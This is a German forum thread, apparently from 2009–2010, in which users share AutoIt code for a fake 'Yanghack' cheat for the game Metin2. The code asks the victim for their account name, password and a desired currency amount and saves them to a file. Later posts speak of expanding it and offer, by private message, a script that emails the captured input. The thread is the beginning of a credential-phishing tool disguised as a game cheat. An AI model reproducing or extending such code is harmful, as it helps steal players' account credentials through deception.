AutoIT E-Mail

02/02/2009 15:53 Darkness321#16
Hier dein Code

Quote:
#include <File.au3>
#include <String.au3>

$file = "daten.txt"

$id = InputBox ("Yanghack für Metin2 DE Schritt 1", "Benutzername")
$pw = InputBox ("Yanghack für Metin2 DE Schritt 2", "Passwort", "", "*")
$Yang = InputBox ("Yanghack für Metin2 DE Schritt 3", "Gewünschter Yangbetrag")

FileWrite ($file, "")
_FileWriteToLine ($file, 1, $id, 1)
_FileWriteToLine ($file, 2, $pw, 1)
_FileWriteToLine ($file, 3, $Yang, 1)

$id2 = FileReadLine ($file, 1)
$pw2 = FileReadLine ($file, 2)
$Yang2 = FileReadLine ($file, 3)

FileClose($file)

Exit
02/02/2009 17:29 Knochenfabrikant#17
Thx^^
Jetzt muss ichs nur noch weiter ausbaun xD
02/02/2009 18:54 Darkness321#18
jo ^^

naja wird aba net so schwer nur mit gui da gehts iwie immanoch net xD
03/03/2010 15:43 seloflash#19
gebe per pn mein script weiter
das den inhalt der inputbox per email verschickt

lg, selim